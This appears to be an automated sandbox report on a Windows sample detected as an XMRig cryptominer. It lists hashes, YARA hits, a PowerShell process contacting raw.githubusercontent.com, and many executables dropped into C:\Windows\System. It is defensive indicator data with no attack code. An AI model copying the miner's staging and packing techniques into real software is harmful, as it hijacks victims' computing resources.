xmrig | 9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f

Analysis

max time kernel
133s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
30/06/2024, 00:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
Size

1.7MB
MD5

5802d0f41366092f66b1c8e1e10e897b
SHA1

47fc1f2baf82d1150d18a7f5afc8b4af817dff7f
SHA256

9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f
SHA512

1ba71abaa773b4f470a2192f851ea5c0ff46eccf39035766257f31778be5e9dcffa0b8f48a164d984b745cb8b95a9fcc050b28f34ad67f7bd11deb11976504a9
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgspmBeQxWCLU0SwVTrb4mi7J:Lz071uv4BPMkFfdg6NsIRSwVTrbq

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 48 IoCs

resource	yara_rule
behavioral2/memory/3780-130-0x00007FF7F6470000-0x00007FF7F6862000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/548-140-0x00007FF630D60000-0x00007FF631152000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4840-145-0x00007FF6A1100000-0x00007FF6A14F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1108-152-0x00007FF643190000-0x00007FF643582000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1976-153-0x00007FF6F1960000-0x00007FF6F1D52000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2844-150-0x00007FF6A96B0000-0x00007FF6A9AA2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1856-147-0x00007FF7B3F20000-0x00007FF7B4312000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3224-146-0x00007FF63E520000-0x00007FF63E912000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2092-144-0x00007FF747280000-0x00007FF747672000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4404-143-0x00007FF641DC0000-0x00007FF6421B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4076-139-0x00007FF680860000-0x00007FF680C52000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/512-138-0x00007FF7E8330000-0x00007FF7E8722000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1796-136-0x00007FF71DC20000-0x00007FF71E012000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/8-135-0x00007FF79CEF0000-0x00007FF79D2E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4196-129-0x00007FF7D8750000-0x00007FF7D8B42000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1036-125-0x00007FF77EBF0000-0x00007FF77EFE2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2596-124-0x00007FF714FF0000-0x00007FF7153E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1328-113-0x00007FF64CB40000-0x00007FF64CF32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4876-101-0x00007FF6F8490000-0x00007FF6F8882000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1676-99-0x00007FF7F0C50000-0x00007FF7F1042000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/528-11-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/528-4588-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2312-4590-0x00007FF6D1AA0000-0x00007FF6D1E92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3024-4589-0x00007FF73D820000-0x00007FF73DC12000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/528-4592-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3024-4594-0x00007FF73D820000-0x00007FF73DC12000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1676-4598-0x00007FF7F0C50000-0x00007FF7F1042000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2844-4597-0x00007FF6A96B0000-0x00007FF6A9AA2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2312-4603-0x00007FF6D1AA0000-0x00007FF6D1E92000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3100-4604-0x00007FF77BE60000-0x00007FF77C252000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1108-4601-0x00007FF643190000-0x00007FF643582000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1796-4606-0x00007FF71DC20000-0x00007FF71E012000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4876-4622-0x00007FF6F8490000-0x00007FF6F8882000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4840-4627-0x00007FF6A1100000-0x00007FF6A14F2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2092-4630-0x00007FF747280000-0x00007FF747672000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3224-4632-0x00007FF63E520000-0x00007FF63E912000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4076-4634-0x00007FF680860000-0x00007FF680C52000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1856-4628-0x00007FF7B3F20000-0x00007FF7B4312000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1036-4624-0x00007FF77EBF0000-0x00007FF77EFE2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1328-4620-0x00007FF64CB40000-0x00007FF64CF32000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/2596-4619-0x00007FF714FF0000-0x00007FF7153E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/512-4616-0x00007FF7E8330000-0x00007FF7E8722000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4196-4613-0x00007FF7D8750000-0x00007FF7D8B42000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/8-4611-0x00007FF79CEF0000-0x00007FF79D2E2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1976-4608-0x00007FF6F1960000-0x00007FF6F1D52000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/3780-4615-0x00007FF7F6470000-0x00007FF7F6862000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/4404-4647-0x00007FF641DC0000-0x00007FF6421B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/548-4643-0x00007FF630D60000-0x00007FF631152000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 64 IoCs

resource	yara_rule
behavioral2/memory/3428-0-0x00007FF620440000-0x00007FF620832000-memory.dmp	UPX
behavioral2/files/0x000700000002342d-16.dat	UPX
behavioral2/files/0x0007000000023431-44.dat	UPX
behavioral2/files/0x0007000000023432-41.dat	UPX
behavioral2/files/0x0007000000023441-93.dat	UPX
behavioral2/files/0x0007000000023440-92.dat	UPX
behavioral2/files/0x0007000000023439-107.dat	UPX
behavioral2/files/0x0007000000023442-127.dat	UPX
behavioral2/memory/3780-130-0x00007FF7F6470000-0x00007FF7F6862000-memory.dmp	UPX
behavioral2/memory/548-140-0x00007FF630D60000-0x00007FF631152000-memory.dmp	UPX
behavioral2/memory/4840-145-0x00007FF6A1100000-0x00007FF6A14F2000-memory.dmp	UPX
behavioral2/memory/1108-152-0x00007FF643190000-0x00007FF643582000-memory.dmp	UPX
behavioral2/files/0x0008000000023448-180.dat	UPX
behavioral2/files/0x000700000002344d-209.dat	UPX
behavioral2/files/0x000700000002344e-218.dat	UPX
behavioral2/files/0x000700000002344c-204.dat	UPX
behavioral2/files/0x000700000002344b-203.dat	UPX
behavioral2/files/0x0007000000023446-194.dat	UPX
behavioral2/files/0x000700000002344a-190.dat	UPX
behavioral2/files/0x0007000000023449-187.dat	UPX
behavioral2/files/0x0007000000023445-169.dat	UPX
behavioral2/files/0x000800000002342a-154.dat	UPX
behavioral2/memory/1976-153-0x00007FF6F1960000-0x00007FF6F1D52000-memory.dmp	UPX
behavioral2/memory/2844-150-0x00007FF6A96B0000-0x00007FF6A9AA2000-memory.dmp	UPX
behavioral2/memory/1856-147-0x00007FF7B3F20000-0x00007FF7B4312000-memory.dmp	UPX
behavioral2/memory/3224-146-0x00007FF63E520000-0x00007FF63E912000-memory.dmp	UPX
behavioral2/memory/2092-144-0x00007FF747280000-0x00007FF747672000-memory.dmp	UPX
behavioral2/memory/4404-143-0x00007FF641DC0000-0x00007FF6421B2000-memory.dmp	UPX
behavioral2/files/0x0007000000023444-141.dat	UPX
behavioral2/memory/4076-139-0x00007FF680860000-0x00007FF680C52000-memory.dmp	UPX
behavioral2/memory/512-138-0x00007FF7E8330000-0x00007FF7E8722000-memory.dmp	UPX
behavioral2/memory/1796-136-0x00007FF71DC20000-0x00007FF71E012000-memory.dmp	UPX
behavioral2/memory/8-135-0x00007FF79CEF0000-0x00007FF79D2E2000-memory.dmp	UPX
behavioral2/memory/4196-129-0x00007FF7D8750000-0x00007FF7D8B42000-memory.dmp	UPX
behavioral2/files/0x000700000002343d-126.dat	UPX
behavioral2/memory/1036-125-0x00007FF77EBF0000-0x00007FF77EFE2000-memory.dmp	UPX
behavioral2/memory/2596-124-0x00007FF714FF0000-0x00007FF7153E2000-memory.dmp	UPX
behavioral2/files/0x0007000000023443-122.dat	UPX
behavioral2/files/0x0007000000023437-116.dat	UPX
behavioral2/files/0x000700000002343f-115.dat	UPX
behavioral2/files/0x000700000002343e-114.dat	UPX
behavioral2/memory/1328-113-0x00007FF64CB40000-0x00007FF64CF32000-memory.dmp	UPX
behavioral2/files/0x000700000002343b-110.dat	UPX
behavioral2/files/0x000700000002343a-108.dat	UPX
behavioral2/files/0x0007000000023438-103.dat	UPX
behavioral2/memory/4876-101-0x00007FF6F8490000-0x00007FF6F8882000-memory.dmp	UPX
behavioral2/files/0x000700000002343c-100.dat	UPX
behavioral2/memory/1676-99-0x00007FF7F0C50000-0x00007FF7F1042000-memory.dmp	UPX
behavioral2/files/0x0007000000023433-105.dat	UPX
behavioral2/files/0x0007000000023434-85.dat	UPX
behavioral2/files/0x0007000000023435-96.dat	UPX
behavioral2/files/0x000700000002342f-66.dat	UPX
behavioral2/files/0x0007000000023436-58.dat	UPX
behavioral2/files/0x0007000000023430-33.dat	UPX
behavioral2/memory/2312-49-0x00007FF6D1AA0000-0x00007FF6D1E92000-memory.dmp	UPX
behavioral2/memory/3100-27-0x00007FF77BE60000-0x00007FF77C252000-memory.dmp	UPX
behavioral2/files/0x000700000002342e-34.dat	UPX
behavioral2/memory/3024-24-0x00007FF73D820000-0x00007FF73DC12000-memory.dmp	UPX
behavioral2/memory/528-11-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	UPX
behavioral2/files/0x0008000000023426-6.dat	UPX
behavioral2/memory/528-4588-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	UPX
behavioral2/memory/2312-4590-0x00007FF6D1AA0000-0x00007FF6D1E92000-memory.dmp	UPX
behavioral2/memory/3024-4589-0x00007FF73D820000-0x00007FF73DC12000-memory.dmp	UPX
behavioral2/memory/528-4592-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	UPX

XMRig Miner payload 48 IoCs

miner

resource	yara_rule
behavioral2/memory/3780-130-0x00007FF7F6470000-0x00007FF7F6862000-memory.dmp	xmrig
behavioral2/memory/548-140-0x00007FF630D60000-0x00007FF631152000-memory.dmp	xmrig
behavioral2/memory/4840-145-0x00007FF6A1100000-0x00007FF6A14F2000-memory.dmp	xmrig
behavioral2/memory/1108-152-0x00007FF643190000-0x00007FF643582000-memory.dmp	xmrig
behavioral2/memory/1976-153-0x00007FF6F1960000-0x00007FF6F1D52000-memory.dmp	xmrig
behavioral2/memory/2844-150-0x00007FF6A96B0000-0x00007FF6A9AA2000-memory.dmp	xmrig
behavioral2/memory/1856-147-0x00007FF7B3F20000-0x00007FF7B4312000-memory.dmp	xmrig
behavioral2/memory/3224-146-0x00007FF63E520000-0x00007FF63E912000-memory.dmp	xmrig
behavioral2/memory/2092-144-0x00007FF747280000-0x00007FF747672000-memory.dmp	xmrig
behavioral2/memory/4404-143-0x00007FF641DC0000-0x00007FF6421B2000-memory.dmp	xmrig
behavioral2/memory/4076-139-0x00007FF680860000-0x00007FF680C52000-memory.dmp	xmrig
behavioral2/memory/512-138-0x00007FF7E8330000-0x00007FF7E8722000-memory.dmp	xmrig
behavioral2/memory/1796-136-0x00007FF71DC20000-0x00007FF71E012000-memory.dmp	xmrig
behavioral2/memory/8-135-0x00007FF79CEF0000-0x00007FF79D2E2000-memory.dmp	xmrig
behavioral2/memory/4196-129-0x00007FF7D8750000-0x00007FF7D8B42000-memory.dmp	xmrig
behavioral2/memory/1036-125-0x00007FF77EBF0000-0x00007FF77EFE2000-memory.dmp	xmrig
behavioral2/memory/2596-124-0x00007FF714FF0000-0x00007FF7153E2000-memory.dmp	xmrig
behavioral2/memory/1328-113-0x00007FF64CB40000-0x00007FF64CF32000-memory.dmp	xmrig
behavioral2/memory/4876-101-0x00007FF6F8490000-0x00007FF6F8882000-memory.dmp	xmrig
behavioral2/memory/1676-99-0x00007FF7F0C50000-0x00007FF7F1042000-memory.dmp	xmrig
behavioral2/memory/528-11-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	xmrig
behavioral2/memory/528-4588-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	xmrig
behavioral2/memory/2312-4590-0x00007FF6D1AA0000-0x00007FF6D1E92000-memory.dmp	xmrig
behavioral2/memory/3024-4589-0x00007FF73D820000-0x00007FF73DC12000-memory.dmp	xmrig
behavioral2/memory/528-4592-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	xmrig
behavioral2/memory/3024-4594-0x00007FF73D820000-0x00007FF73DC12000-memory.dmp	xmrig
behavioral2/memory/1676-4598-0x00007FF7F0C50000-0x00007FF7F1042000-memory.dmp	xmrig
behavioral2/memory/2844-4597-0x00007FF6A96B0000-0x00007FF6A9AA2000-memory.dmp	xmrig
behavioral2/memory/2312-4603-0x00007FF6D1AA0000-0x00007FF6D1E92000-memory.dmp	xmrig
behavioral2/memory/3100-4604-0x00007FF77BE60000-0x00007FF77C252000-memory.dmp	xmrig
behavioral2/memory/1108-4601-0x00007FF643190000-0x00007FF643582000-memory.dmp	xmrig
behavioral2/memory/1796-4606-0x00007FF71DC20000-0x00007FF71E012000-memory.dmp	xmrig
behavioral2/memory/4876-4622-0x00007FF6F8490000-0x00007FF6F8882000-memory.dmp	xmrig
behavioral2/memory/4840-4627-0x00007FF6A1100000-0x00007FF6A14F2000-memory.dmp	xmrig
behavioral2/memory/2092-4630-0x00007FF747280000-0x00007FF747672000-memory.dmp	xmrig
behavioral2/memory/3224-4632-0x00007FF63E520000-0x00007FF63E912000-memory.dmp	xmrig
behavioral2/memory/4076-4634-0x00007FF680860000-0x00007FF680C52000-memory.dmp	xmrig
behavioral2/memory/1856-4628-0x00007FF7B3F20000-0x00007FF7B4312000-memory.dmp	xmrig
behavioral2/memory/1036-4624-0x00007FF77EBF0000-0x00007FF77EFE2000-memory.dmp	xmrig
behavioral2/memory/1328-4620-0x00007FF64CB40000-0x00007FF64CF32000-memory.dmp	xmrig
behavioral2/memory/2596-4619-0x00007FF714FF0000-0x00007FF7153E2000-memory.dmp	xmrig
behavioral2/memory/512-4616-0x00007FF7E8330000-0x00007FF7E8722000-memory.dmp	xmrig
behavioral2/memory/4196-4613-0x00007FF7D8750000-0x00007FF7D8B42000-memory.dmp	xmrig
behavioral2/memory/8-4611-0x00007FF79CEF0000-0x00007FF79D2E2000-memory.dmp	xmrig
behavioral2/memory/1976-4608-0x00007FF6F1960000-0x00007FF6F1D52000-memory.dmp	xmrig
behavioral2/memory/3780-4615-0x00007FF7F6470000-0x00007FF7F6862000-memory.dmp	xmrig
behavioral2/memory/4404-4647-0x00007FF641DC0000-0x00007FF6421B2000-memory.dmp	xmrig
behavioral2/memory/548-4643-0x00007FF630D60000-0x00007FF631152000-memory.dmp	xmrig

Blocklisted process makes network request 22 IoCs

flow	pid	Process
3	4084	powershell.exe
5	4084	powershell.exe
7	4084	powershell.exe
8	4084	powershell.exe
10	4084	powershell.exe
11	4084	powershell.exe
13	4084	powershell.exe
18	4084	powershell.exe
19	4084	powershell.exe
20	4084	powershell.exe
21	4084	powershell.exe
22	4084	powershell.exe
23	4084	powershell.exe
24	4084	powershell.exe
25	4084	powershell.exe
26	4084	powershell.exe
27	4084	powershell.exe
28	4084	powershell.exe
29	4084	powershell.exe
30	4084	powershell.exe
31	4084	powershell.exe
32	4084	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4084	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
528	objBbrj.exe
3024	BMfwdYM.exe
3100	QLjteGi.exe
2844	sSeUwGN.exe
2312	hcgTrSe.exe
1676	ePvDkop.exe
1108	WyzRWAQ.exe
4876	ykkOFVP.exe
1328	WSqPCti.exe
2596	BbksJtS.exe
1036	IMivPca.exe
4196	cktcuzx.exe
3780	IShGwrS.exe
8	vzkqtMD.exe
1976	fkmXhYS.exe
1796	odmLDbj.exe
512	QtFrpIc.exe
4076	uaRcQhL.exe
548	UHfqfYP.exe
4404	dteyRco.exe
2092	dJhVmPq.exe
4840	pooWlbA.exe
3224	vXCLXvP.exe
1856	ZZEOomo.exe
4416	EUoaXVq.exe
2452	fkpYAOE.exe
4900	VWNafDp.exe
3236	UTlqqVU.exe
2264	WxDDjHi.exe
4848	SHOdjED.exe
2084	vhNDTRF.exe
4972	lhpPjvs.exe
2224	pAMsiAM.exe
2676	GUiTWje.exe
3700	ZRPmNVD.exe
3404	MaxzBwe.exe
1932	pxmCCuX.exe
724	tqKnTBd.exe
3988	ZSMvqrr.exe
3172	iytHGSA.exe
2132	ynWKvAd.exe
4828	aleaAPA.exe
4668	KrdEBRF.exe
4588	XumlJYd.exe
3980	XlrJatt.exe
1500	MtvEGCh.exe
4700	wQGUPEM.exe
1172	OVTMCsN.exe
4488	UmJjvKq.exe
4396	NxxrrZj.exe
5012	fdGJchj.exe
4276	nMcImNt.exe
3152	vzJWtFB.exe
2984	DjnqaHJ.exe
3976	pGqEaTm.exe
1912	BNZzqeN.exe
1028	hnkQCwP.exe
2384	bjyBRBv.exe
436	WBJkrwF.exe
1524	cpMeMna.exe
4744	ObTqyls.exe
1680	SEFPGvK.exe
2896	itIxaos.exe
2952	pdatKik.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3428-0-0x00007FF620440000-0x00007FF620832000-memory.dmp	upx
behavioral2/files/0x000700000002342d-16.dat	upx
behavioral2/files/0x0007000000023431-44.dat	upx
behavioral2/files/0x0007000000023432-41.dat	upx
behavioral2/files/0x0007000000023441-93.dat	upx
behavioral2/files/0x0007000000023440-92.dat	upx
behavioral2/files/0x0007000000023439-107.dat	upx
behavioral2/files/0x0007000000023442-127.dat	upx
behavioral2/memory/3780-130-0x00007FF7F6470000-0x00007FF7F6862000-memory.dmp	upx
behavioral2/memory/548-140-0x00007FF630D60000-0x00007FF631152000-memory.dmp	upx
behavioral2/memory/4840-145-0x00007FF6A1100000-0x00007FF6A14F2000-memory.dmp	upx
behavioral2/memory/1108-152-0x00007FF643190000-0x00007FF643582000-memory.dmp	upx
behavioral2/files/0x0008000000023448-180.dat	upx
behavioral2/files/0x000700000002344d-209.dat	upx
behavioral2/files/0x000700000002344e-218.dat	upx
behavioral2/files/0x000700000002344c-204.dat	upx
behavioral2/files/0x000700000002344b-203.dat	upx
behavioral2/files/0x0007000000023446-194.dat	upx
behavioral2/files/0x000700000002344a-190.dat	upx
behavioral2/files/0x0007000000023449-187.dat	upx
behavioral2/files/0x0007000000023445-169.dat	upx
behavioral2/files/0x000800000002342a-154.dat	upx
behavioral2/memory/1976-153-0x00007FF6F1960000-0x00007FF6F1D52000-memory.dmp	upx
behavioral2/memory/2844-150-0x00007FF6A96B0000-0x00007FF6A9AA2000-memory.dmp	upx
behavioral2/memory/1856-147-0x00007FF7B3F20000-0x00007FF7B4312000-memory.dmp	upx
behavioral2/memory/3224-146-0x00007FF63E520000-0x00007FF63E912000-memory.dmp	upx
behavioral2/memory/2092-144-0x00007FF747280000-0x00007FF747672000-memory.dmp	upx
behavioral2/memory/4404-143-0x00007FF641DC0000-0x00007FF6421B2000-memory.dmp	upx
behavioral2/files/0x0007000000023444-141.dat	upx
behavioral2/memory/4076-139-0x00007FF680860000-0x00007FF680C52000-memory.dmp	upx
behavioral2/memory/512-138-0x00007FF7E8330000-0x00007FF7E8722000-memory.dmp	upx
behavioral2/memory/1796-136-0x00007FF71DC20000-0x00007FF71E012000-memory.dmp	upx
behavioral2/memory/8-135-0x00007FF79CEF0000-0x00007FF79D2E2000-memory.dmp	upx
behavioral2/memory/4196-129-0x00007FF7D8750000-0x00007FF7D8B42000-memory.dmp	upx
behavioral2/files/0x000700000002343d-126.dat	upx
behavioral2/memory/1036-125-0x00007FF77EBF0000-0x00007FF77EFE2000-memory.dmp	upx
behavioral2/memory/2596-124-0x00007FF714FF0000-0x00007FF7153E2000-memory.dmp	upx
behavioral2/files/0x0007000000023443-122.dat	upx
behavioral2/files/0x0007000000023437-116.dat	upx
behavioral2/files/0x000700000002343f-115.dat	upx
behavioral2/files/0x000700000002343e-114.dat	upx
behavioral2/memory/1328-113-0x00007FF64CB40000-0x00007FF64CF32000-memory.dmp	upx
behavioral2/files/0x000700000002343b-110.dat	upx
behavioral2/files/0x000700000002343a-108.dat	upx
behavioral2/files/0x0007000000023438-103.dat	upx
behavioral2/memory/4876-101-0x00007FF6F8490000-0x00007FF6F8882000-memory.dmp	upx
behavioral2/files/0x000700000002343c-100.dat	upx
behavioral2/memory/1676-99-0x00007FF7F0C50000-0x00007FF7F1042000-memory.dmp	upx
behavioral2/files/0x0007000000023433-105.dat	upx
behavioral2/files/0x0007000000023434-85.dat	upx
behavioral2/files/0x0007000000023435-96.dat	upx
behavioral2/files/0x000700000002342f-66.dat	upx
behavioral2/files/0x0007000000023436-58.dat	upx
behavioral2/files/0x0007000000023430-33.dat	upx
behavioral2/memory/2312-49-0x00007FF6D1AA0000-0x00007FF6D1E92000-memory.dmp	upx
behavioral2/memory/3100-27-0x00007FF77BE60000-0x00007FF77C252000-memory.dmp	upx
behavioral2/files/0x000700000002342e-34.dat	upx
behavioral2/memory/3024-24-0x00007FF73D820000-0x00007FF73DC12000-memory.dmp	upx
behavioral2/memory/528-11-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	upx
behavioral2/files/0x0008000000023426-6.dat	upx
behavioral2/memory/528-4588-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	upx
behavioral2/memory/2312-4590-0x00007FF6D1AA0000-0x00007FF6D1E92000-memory.dmp	upx
behavioral2/memory/3024-4589-0x00007FF73D820000-0x00007FF73DC12000-memory.dmp	upx
behavioral2/memory/528-4592-0x00007FF7E48E0000-0x00007FF7E4CD2000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\guJVDZr.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\OyFkHzN.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\MmxaTiX.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\KnczZlE.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\Egduouw.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\LpxlRWa.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\BxaWdVu.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\EeZMGYY.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\OqCqfDP.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\ooMXzTv.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\SSBYoOC.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\CdyNPGk.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\dmzVjTB.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\dcytEwm.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\MyFFEHI.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\sVKHBbA.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\QyLaxcW.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\FJaczWO.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\aqQiUsU.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\FuqrFMQ.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\lZXGsxI.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\hRPwTIo.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\tPTaPkk.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\CqfFwmU.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\xUDtoZy.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\kTYEhCS.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\zHXwxoG.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
File created	C:\Windows\System\DuHsPvW.exe	9892179f7e8ee8fd2ddf2609096ef8ae58ce97c976bd83bdc8e57c8aa9bf146f.exe
